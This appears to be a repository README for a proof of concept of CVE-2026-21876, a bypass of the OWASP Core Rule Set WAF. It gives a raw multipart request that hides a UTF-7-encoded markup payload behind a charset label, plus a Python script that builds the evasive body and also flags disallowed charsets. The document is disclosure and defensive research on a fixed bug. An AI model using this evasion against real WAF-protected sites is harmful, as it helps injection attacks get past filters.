# CVE-2026-21876 (OWASP CRS WAF bypass)
Docker container and minimal PoC for CVE-2026-21876, a multipart charset bypass of the OWASP Core Rule Set (fixed in CRS 4.22.0 and 3.3.8).
I would like to thank [@airween](https://github.com/airween) and [@fzipi](https://github.com/fzipi) separately for their quick response! The vulnerability fix was ready in a very short time.
# PoC
```
POST /submit HTTP/1.1
Host: localhost
User-Agent: curl/8.17.0
Accept: */*
Origin: https://example.com
Content-Length: 367
Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz

--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="username"
Content-Type: text/plain; charset=utf-7

+ADw-img+ACA-src+AD0-x+AD4-
--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="dummy"
Content-Type: text/plain; charset=utf-8

dummy
--------------------------cmOi6twNhVJDu76bOwDTVz--
```
The `charset=utf-7` declared in the `Content-Type` header of the `username` part is not checked against the whitelist of allowed charsets. The UTF-7 encoded value `+ADw-img+ACA-src+AD0-x+AD4-` (which decodes to `<img src=x>`) therefore reaches the WAF as nothing but alphanumerics, `+` and `-`, so the attack rules see no markup, while a backend that honours the part's charset label decodes it back into the original payload. That is the WAF bypass.
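The following script is an added example and is not code from this repository or from the CRS project. It rebuilds the PoC body above from the plain payload, then shows both sides of the bypass: the raw bytes of the `username` part that a WAF inspects contain no `<` or `>`, while decoding the part with its declared charset, as a backend that trusts the label would, yields `<img src=x>`. It also implements the kind of check the fix needs: flag any part whose declared charset is outside an allowlist. The allowlist, the part names and the tiny multipart splitter are assumptions made for the example; the splitter expects CRLF line endings, as curl sends.

```python
"""Added example for the CVE-2026-21876 PoC (not the repository's own code)."""
import base64
import re
from typing import Dict, List, Optional, Tuple

BOUNDARY = "------------------------cmOi6twNhVJDu76bOwDTVz"  # boundary used in the PoC
ALLOWED_CHARSETS = {"utf-8"}  # assumed allowlist; a real deployment configures its own


def utf7_encode_all(text: str) -> str:
    """UTF-7 encode `text`, wrapping every non-alphanumeric character in +...-
    (RFC 2152 base64 of its UTF-16BE form, padding stripped), as the PoC does."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
            out.append(f"+{b64}-")
    return "".join(out)


def build_body(username_value: str, charset: str, boundary: str = BOUNDARY) -> bytes:
    """Assemble the PoC multipart body: a `username` part labelled with `charset`
    (UTF-7 encoded when the label is utf-7) followed by the `dummy` part."""
    value = utf7_encode_all(username_value) if charset == "utf-7" else username_value
    lines = [
        f"--{boundary}",
        'Content-Disposition: form-data; name="username"',
        f"Content-Type: text/plain; charset={charset}",
        "",
        value,
        f"--{boundary}",
        'Content-Disposition: form-data; name="dummy"',
        "Content-Type: text/plain; charset=utf-8",
        "",
        "dummy",
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_multipart(body: bytes, boundary: str) -> List[Dict]:
    """Minimal multipart/form-data splitter (assumption: CRLF line endings)."""
    delim = b"--" + boundary.encode("ascii")
    parts = []
    for chunk in body.split(delim):
        if not chunk.startswith(b"\r\n"):
            continue  # preamble or the trailing "--" of the closing delimiter
        head, _, data = chunk[2:].partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("ascii").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "data": data.rstrip(b"\r\n")})
    return parts


def part_name(headers: Dict[str, str]) -> str:
    m = re.search(r'name="([^"]*)"', headers.get("content-disposition", ""))
    return m.group(1) if m else "?"


def declared_charset(headers: Dict[str, str]) -> Optional[str]:
    """Charset parameter of the part's own Content-Type header, lower-cased."""
    m = re.search(r'charset\s*=\s*"?([^";\s]+)"?', headers.get("content-type", ""), re.I)
    return m.group(1).lower() if m else None


def disallowed_charsets(body: bytes, boundary: str = BOUNDARY) -> List[Tuple[str, str]]:
    """(part name, charset) for every part whose declared charset is not allowlisted.
    This is the check the bypass relies on being absent."""
    return [
        (part_name(p["headers"]), cs)
        for p in parse_multipart(body, boundary)
        if (cs := declared_charset(p["headers"])) is not None and cs not in ALLOWED_CHARSETS
    ]


def waf_view(body: bytes, boundary: str = BOUNDARY) -> Dict[str, bytes]:
    """Raw part bytes, i.e. what an engine that does not apply the charset inspects."""
    return {part_name(p["headers"]): p["data"] for p in parse_multipart(body, boundary)}


def backend_view(body: bytes, boundary: str = BOUNDARY) -> Dict[str, str]:
    """What a backend that honours each part's charset label decodes (an assumption
    about the backend; many frameworks do exactly this)."""
    return {
        part_name(p["headers"]): p["data"].decode(declared_charset(p["headers"]) or "utf-8")
        for p in parse_multipart(body, boundary)
    }


if __name__ == "__main__":
    body = build_body("<img src=x>", "utf-7")
    print(body.decode("ascii"))
    print("WAF sees:    ", waf_view(body)["username"])
    print("backend sees:", backend_view(body)["username"])
    print("flagged:     ", disallowed_charsets(body))
```

Run as is and the `username` part on the wire is `+ADw-img+ACA-src+AD0-x+AD4-`, `waf_view` shows it contains no `<`, `backend_view` shows `<img src=x>`, and `disallowed_charsets` reports `[("username", "utf-7")]`; the same payload sent with `charset=utf-8` is flagged by nothing but carries the literal `<img src=x>`, which the regular attack rules match.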
# Bypass demo
# The same payload is blocked here
# References
- [GitHub security advisory](https://github.com/coreruleset/coreruleset/security/advisories/GHSA-36fv-25j3-r2c5)
- [OWASP CRS walkthrough blogpost](https://coreruleset.org/20260106/cve-2026-21876-critical-multipart-charset-bypass-fixed-in-crs-4.22.0-and-3.3.8/)